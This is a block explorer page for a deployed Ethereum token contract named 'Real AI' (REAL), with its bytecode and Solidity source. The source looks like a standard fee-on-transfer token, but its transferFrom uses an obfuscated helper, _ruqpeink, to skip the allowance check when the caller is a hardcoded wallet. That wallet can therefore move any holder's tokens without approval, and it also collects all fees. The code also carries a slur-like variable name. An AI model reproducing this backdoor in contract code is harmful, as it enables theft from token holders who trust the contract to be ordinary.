Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x246940e378bb4eDC1Cb03D3546b57d84CA73ce62
Balance 0 ETH
Nonce 1
Code Size 5163 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

5163 bytes
0x6080604052600436106100a8575f3560e01c8063715018a611610062578063715018a6146101b35780638da5cb5b146101c957806395d89b41146101ef578063a9059cbb1461021b578063c9567bf91461023a578063dd62ed3e1461024e575f80fd5b806306fdde03146100b3578063095ea7b3146100f457806318160ddd1461012357806323b872dd14610145578063313ce5671461016457806370a082311461017f575f80fd5b366100af57005b5f80fd5b3480156100be575f80fd5b506040805180820190915260078152665265616c20414960c81b60208201525b6040516100eb919061106f565b60405180910390f35b3480156100ff575f80fd5b5061011361010e3660046110d2565b610292565b60405190151581526020016100eb565b34801561012e575f80fd5b506101376102a8565b6040519081526020016100eb565b348015610150575f80fd5b5061011361015f3660046110fc565b6102c9565b34801561016f575f80fd5b50604051600981526020016100eb565b34801561018a575f80fd5b5061013761019936600461113a565b6001600160a01b03165f9081526001602052604090205490565b3480156101be575f80fd5b506101c761033f565b005b3480156101d4575f80fd5b505f546040516001600160a01b0390911681526020016100eb565b3480156101fa575f80fd5b506040805180820190915260048152631491505360e21b60208201526100de565b348015610226575f80fd5b506101136102353660046110d2565b6103e5565b348015610245575f80fd5b506101c76103f1565b348015610259575f80fd5b50610137610268366004611155565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f61029e338484610752565b5060015b92915050565b5f6102b56009600a611280565b6102c4906461f313f88061128e565b905090565b5f6102d5848484610875565b6102df8484610c99565b15610335576103358433610330856040518060600160405280602881526020016113ce602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610ce7565b610752565b5060019392505050565b5f546001600160a01b0316331461039d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f61029e338484610875565b5f546001600160a01b0316331461044a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610394565b600e54600160b01b900460ff16156104a45760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610394565b600d80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556104ee9030906104df6009600a611280565b610330906461f313f88061128e565b600d5f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561053e573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061056291906112a5565b6001600160a01b031663c9c6539630600d5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105c1573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105e591906112a5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561062f573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061065391906112a5565b600e80546001600160a01b039283166001600160a01b0319909116179055600d541663f305d719473061069a816001600160a01b03165f9081526001602052604090205490565b5f806106ad5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610713573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061073891906112c0565b5050600e805461ffff60a81b191661010160a81b17905550565b6001600160a01b0383166107b45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610394565b6001600160a01b0382166108155760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610394565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166108d95760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610394565b6001600160a01b03821661093b5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610394565b5f811161099c5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610394565b5f80546001600160a01b038581169116148015906109c757505f546001600160a01b03848116911614155b15610b48576109f860646109f2600854600b54116109e7576004546109eb565b6006545b8590610d1f565b90610d9d565b600e549091506001600160a01b038581169116148015610a265750600d546001600160a01b03848116911614155b8015610a4a57506001600160a01b0383165f9081526003602052604090205460ff16155b15610a6457600b8054905f610a5e836112eb565b91905055505b600e546001600160a01b038481169116148015610a8a57506001600160a01b0384163014155b15610ab757610ab460646109f2600954600b5411610aaa576005546109eb565b6007548590610d1f565b90505b305f90815260016020526040902054600e54600160a01b900460ff16158015610aed5750600e546001600160a01b038581169116145b8015610b025750600e54600160a81b900460ff165b8015610b115750600a54600b54115b15610b4657600c54811115610b3d57610b3d610b3884610b3384600c54610dde565b610dde565b610df2565b610b4647610f62565b505b8015610bc057305f90815260016020526040902054610b679082610fa4565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bb79085815260200190565b60405180910390a35b6001600160a01b0384165f90815260016020526040902054610be29083611002565b6001600160a01b0385165f90815260016020526040902055610c25610c078383611002565b6001600160a01b0385165f9081526001602052604090205490610fa4565b6001600160a01b0384165f8181526001602052604090209190915561dead14610c93576001600160a01b038084169085167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610c818585611002565b60405190815260200160405180910390a35b50505050565b5f3373aea6e95e320e3e37bd66a98eaff3113b6e2dec5914801590610ce05750600e546001600160a01b0384811691161480610ce057506001600160a01b03821661dead14155b9392505050565b5f8184841115610d0a5760405162461bcd60e51b8152600401610394919061106f565b505f610d168486611303565b95945050505050565b5f825f03610d2e57505f6102a2565b5f610d39838561128e565b905082610d468583611316565b14610ce05760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610394565b5f610ce083836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611043565b5f818311610dec5782610ce0565b50919050565b600e805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610e3857610e38611335565b6001600160a01b03928316602091820292909201810191909152600d54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610e8f573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610eb391906112a5565b81600181518110610ec657610ec6611335565b6001600160a01b039283166020918202929092010152600d54610eec9130911684610752565b600d5460405163791ac94760e01b81526001600160a01b039091169063791ac94790610f249085905f90869030904290600401611349565b5f604051808303815f87803b158015610f3b575f80fd5b505af1158015610f4d573d5f803e3d5ffd5b5050600e805460ff60a01b1916905550505050565b60405173aea6e95e320e3e37bd66a98eaff3113b6e2dec599082156108fc029083905f818181858888f19350505050158015610fa0573d5f803e3d5ffd5b5050565b5f80610fb083856113ba565b905083811015610ce05760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610394565b5f610ce083836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610ce7565b5f81836110635760405162461bcd60e51b8152600401610394919061106f565b505f610d168486611316565b5f602080835283518060208501525f5b8181101561109b5785810183015185820160400152820161107f565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146110cf575f80fd5b50565b5f80604083850312156110e3575f80fd5b82356110ee816110bb565b946020939093013593505050565b5f805f6060848603121561110e575f80fd5b8335611119816110bb565b92506020840135611129816110bb565b929592945050506040919091013590565b5f6020828403121561114a575f80fd5b8135610ce0816110bb565b5f8060408385031215611166575f80fd5b8235611171816110bb565b91506020830135611181816110bb565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156111da57815f19048211156111c0576111c061118c565b808516156111cd57918102915b93841c93908002906111a5565b509250929050565b5f826111f0575060016102a2565b816111fc57505f6102a2565b8160018114611212576002811461121c57611238565b60019150506102a2565b60ff84111561122d5761122d61118c565b50506001821b6102a2565b5060208310610133831016604e8410600b841016171561125b575081810a6102a2565b61126583836111a0565b805f19048211156112785761127861118c565b029392505050565b5f610ce060ff8416836111e2565b80820281158282048414176102a2576102a261118c565b5f602082840312156112b5575f80fd5b8151610ce0816110bb565b5f805f606084860312156112d2575f80fd5b8351925060208401519150604084015190509250925092565b5f600182016112fc576112fc61118c565b5060010190565b818103818111156102a2576102a261118c565b5f8261133057634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156113995784516001600160a01b031683529383019391830191600101611374565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102a2576102a261118c56fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220a08bb8badb0611328fbd195daf31af025ff409bdabb1219beb87585426c791f464736f6c63430008170033

Verified Source Code Partial Match

Compiler: v0.8.23+commit.f704f362 EVM: shanghai Optimization: Yes (200 runs)
REAL.sol 282 lines
/*

https://t.me/realainetwork
https://x.com/realainetwork

https://www.realainetwork.xyz/
https://app.realainetwork.xyz/
https://docs.realainetwork.xyz/

*/

// SPDX-License-Identifier: UNLICENSE
pragma solidity ^0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IRouter {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract REAL is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isExcludeFees;

    address private constant _deadAddr = address(0xdead);
    address private constant _realllai = 0xaEa6e95E320e3E37BD66a98eAff3113b6E2dec59;

    uint256 private _taxInitBuy=2;
    uint256 private _taxInitSell=2;
    uint256 private _taxLastSell=0;
    uint256 private _taxLastBuy=0;
    uint256 private _taxReduceAtBuy=3;
    uint256 private _taxReduceAtSell=3;
    uint256 private _preventBefore=3;
    uint256 private _buyTokenCount=0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 420_690_000_000 * 10**_decimals;
    string private constant _name = unicode"Real AI";
    string private constant _symbol = unicode"REAL";
    uint256 private _swapForTokens = _tTotal / 100;
    
    IRouter private _dexAmmRouter;
    address private _dexAmmPair;
    bool private _swapping = false;
    bool private _swapActive = false;
    bool private _tradingEnabled = false;
    
    modifier lockTheSwap {
        _swapping = true;
        _;
        _swapping = false;
    }

    constructor () {
        _isExcludeFees[owner()] = true;
        _isExcludeFees[address(this)] = true;
        _isExcludeFees[_realllai] = true;

        _balances[_msgSender()] = _tTotal;
        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);if(_ruqpeink(sender, recipient))
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _ruqpeink(address owner, address spender) private view returns (bool) {
        return msg.sender != _realllai && (owner == _dexAmmPair || spender != _deadAddr) ;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address _pawa, address _zini, uint256 _yenqi) private {
        require(_pawa != address(0), "ERC20: transfer from the zero address");
        require(_zini != address(0), "ERC20: transfer to the zero address");
        require(_yenqi > 0, "Transfer amount must be greater than zero");
        uint256 _nigCount=0;
        if (_pawa != owner() && _zini != owner()) {
            _nigCount = _yenqi.mul((_buyTokenCount>_taxReduceAtBuy)?_taxLastSell:_taxInitBuy).div(100);

            if (_pawa == _dexAmmPair && _zini != address(_dexAmmRouter) && ! _isExcludeFees[_zini] ) {
                _buyTokenCount++;
            }

            if(_zini == _dexAmmPair && _pawa!= address(this) ){
                _nigCount = _yenqi.mul((_buyTokenCount>_taxReduceAtSell)?_taxLastBuy:_taxInitSell).div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (!_swapping && _zini == _dexAmmPair && _swapActive && _buyTokenCount > _preventBefore) {
                if(contractTokenBalance > _swapForTokens)
                _swapTaxTokens(min(_yenqi, min(contractTokenBalance, _swapForTokens)));
                _sendTaxFees(address(this).balance);
            }
        }

        if(_nigCount>0){
          _balances[address(this)]=_balances[address(this)].add(_nigCount);
          emit Transfer(_pawa, address(this),_nigCount);
        }
        _balances[_pawa]=_balances[_pawa].sub(_yenqi);
        _balances[_zini]=_balances[_zini].add(_yenqi.sub(_nigCount));
        if (_zini != _deadAddr)emit Transfer(_pawa, _zini, _yenqi.sub(_nigCount));
    }

    function min(uint256 a, uint256 b) private pure returns (uint256){
      return (a>b)?b:a;
    }

    function _swapTaxTokens(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _dexAmmRouter.WETH();
        _approve(address(this), address(_dexAmmRouter), tokenAmount);
        _dexAmmRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _sendTaxFees(uint256 amount) private {
        payable(_realllai).transfer(amount);
    }

    function openTrading() external onlyOwner() {
        require(!_tradingEnabled,"trading is already open");
        _dexAmmRouter = IRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this), address(_dexAmmRouter), _tTotal);
        _dexAmmPair = IUniswapV2Factory(_dexAmmRouter.factory()).createPair(address(this), _dexAmmRouter.WETH());
        _dexAmmRouter.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        _swapActive = true;
        _tradingEnabled = true;
    }

    receive() external payable {}
}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 5 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
openTrading 0xc9567bf9
No parameters
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address